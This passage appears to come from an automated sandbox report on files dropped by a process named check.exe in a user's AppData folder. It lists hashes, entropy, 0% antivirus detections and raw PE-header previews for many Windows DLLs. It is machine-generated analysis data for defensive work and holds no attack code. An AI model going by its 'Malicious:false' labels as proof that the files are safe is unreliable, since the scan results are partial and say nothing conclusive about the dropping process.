                                                                                                                                                                                                            Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                                            Entropy (8bit):4.818583535960129
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                            MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                            SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                            SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                            SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k............r_...........r................................................3..........Rich....................PE..d....$.g.........." ...).....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):124928
                                                                                                                                                                                                            Entropy (8bit):5.953784637413928
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                            MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                            SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                            SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                            SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.....................7...............7.......7.......7.......6..........D....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).@...........C.......................................0............`.........................................0...d.................................... ......................................P...@............P...............................text....?.......@.................. ..`.rdata..nY...P...Z...D..............@..@.data....=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5232408
                                                                                                                                                                                                            Entropy (8bit):5.940072183736028
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                            MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                            SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                            SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                            SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):792856
                                                                                                                                                                                                            Entropy (8bit):5.57949182561317
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                            MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                            SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                            SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                            SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):67072
                                                                                                                                                                                                            Entropy (8bit):5.909456553599775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:j3sHmR02IvVxv7WCyKm7c5Th4JBHTOvyyaZE:jnIvryCyKx5Th4J5OvyyO
                                                                                                                                                                                                            MD5:49AC12A1F10AB93FAFAB064FD0523A63
                                                                                                                                                                                                            SHA1:3AD6923AB0FB5D3DD9D22ED077DB15B42C2FBD4F
                                                                                                                                                                                                            SHA-256:BA033B79E858DBFCBA6BF8FB5AFE10DEFD1CB03957DBBC68E8E62E4DE6DF492D
                                                                                                                                                                                                            SHA-512:1BC0F50E0BB0A9D9DDDAD31390E5C73B0D11C2B0A8C5462065D477E93FF21F7EDC7AA2B2B36E478BE0A797A38F43E3FBEB6AAABEF0BADEC1D8D16EB73DF67255
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nT..*5..*5..*5..#M2. 5..x@..(5..x@..&5..x@.."5..x@...5...k..(5..aM..;5..*5...5...@..:5...@..+5...@^.+5...@..+5..Rich*5..................PE..d...._.g.........." .........h......\........................................@............`.........................................0...`.......@.... .......................0..(.......................................8............................................text...h........................... ..`.rdata..\I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):70416
                                                                                                                                                                                                            Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                            MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                            SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                            SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                            SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%?..a^e.a^e.a^e.).m.`^e.).e.`^e.)..`^e.).g.`^e.Richa^e.........PE..d......g.........." ...)............................................................z.....`.........................................`..................................../..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6083856
                                                                                                                                                                                                            Entropy (8bit):6.126922729922386
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                            MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                            SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                            SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                            SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).:+..T9......J........................................d.....uF]...`...........................................O.....h.P.......d......0].......\../....d..... A3.T.....................I.(....?3.@............P+..............................text....8+......:+................. ..`.rdata....%..P+...%..>+.............@..@.data...$9....P..N....P.............@....pdata.......0]...... U.............@..@PyRuntim.N...._..P....W.............@....rsrc.........d.......[.............@..@.reloc........d.......[.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):30992
                                                                                                                                                                                                            Entropy (8bit):6.554484610649281
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                            MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                            SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                            SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                            SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):709904
                                                                                                                                                                                                            Entropy (8bit):5.861739047785334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
                                                                                                                                                                                                            MD5:0902D299A2A487A7B0C2D75862B13640
                                                                                                                                                                                                            SHA1:04BCBD5A11861A03A0D323A8050A677C3A88BE13
                                                                                                                                                                                                            SHA-256:2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
                                                                                                                                                                                                            SHA-512:8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):590112
                                                                                                                                                                                                            Entropy (8bit):6.461874649448891
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                            MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                            SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                            SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
                                                                                                                                                                                                            SHA-512:65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):6.499754548353504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
                                                                                                                                                                                                            MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
                                                                                                                                                                                                            SHA1:95CC74C64AB80785F3893D61A73B8A958D24DA29
                                                                                                                                                                                                            SHA-256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
                                                                                                                                                                                                            SHA-512:C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6023664
                                                                                                                                                                                                            Entropy (8bit):6.768988071491288
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                            MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                            SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                            SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                            SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):436720
                                                                                                                                                                                                            Entropy (8bit):6.392610185061176
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
                                                                                                                                                                                                            MD5:0E8FF02D971B61B5D2DD1AC4DF01AE4A
                                                                                                                                                                                                            SHA1:638F0B46730884FA036900649F69F3021557E2FE
                                                                                                                                                                                                            SHA-256:1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
                                                                                                                                                                                                            SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..*..*..*.....*...+..*.../..*.......*...)..*...+..*.O.+..*..+...*.O./..*.O.*..*.O....*.....*.O.(..*.Rich.*.........................PE..d...]._.........." .....\...<.......\..............................................K.....`..........................................h..to...................`...Q..............4.......T.......................(...`...0............p...............................text...yZ.......\.................. ..`.rdata..0....p.......`..............@..@.data...X....@......."..............@....pdata...Q...`...R...2..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7008240
                                                                                                                                                                                                            Entropy (8bit):6.674290383197779
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
                                                                                                                                                                                                            MD5:47307A1E2E9987AB422F09771D590FF1
                                                                                                                                                                                                            SHA1:0DFC3A947E56C749A75F921F4A850A3DCBF04248
                                                                                                                                                                                                            SHA-256:5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
                                                                                                                                                                                                            SHA-512:21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1340400
                                                                                                                                                                                                            Entropy (8bit):6.41486755163134
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:eXPn73RXox1U9M0m+1ffSDY565RzHUY1iaRy95hdGehEM:+7hXU1U95m4ff9A5RviaRy9NGI
                                                                                                                                                                                                            MD5:3569693D5BAE82854DE1D88F86C33184
                                                                                                                                                                                                            SHA1:1A6084ACFD2AA4D32CEDFB7D9023F60EB14E1771
                                                                                                                                                                                                            SHA-256:4EF341AE9302E793878020F0740B09B0F31CB380408A697F75C69FDBD20FC7A1
                                                                                                                                                                                                            SHA-512:E5EFF4A79E1BDAE28A6CA0DA116245A9919023560750FC4A087CDCD0AB969C2F0EEEC63BBEC2CD5222D6824A01DD27D2A8E6684A48202EA733F9BB2FAB048B32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
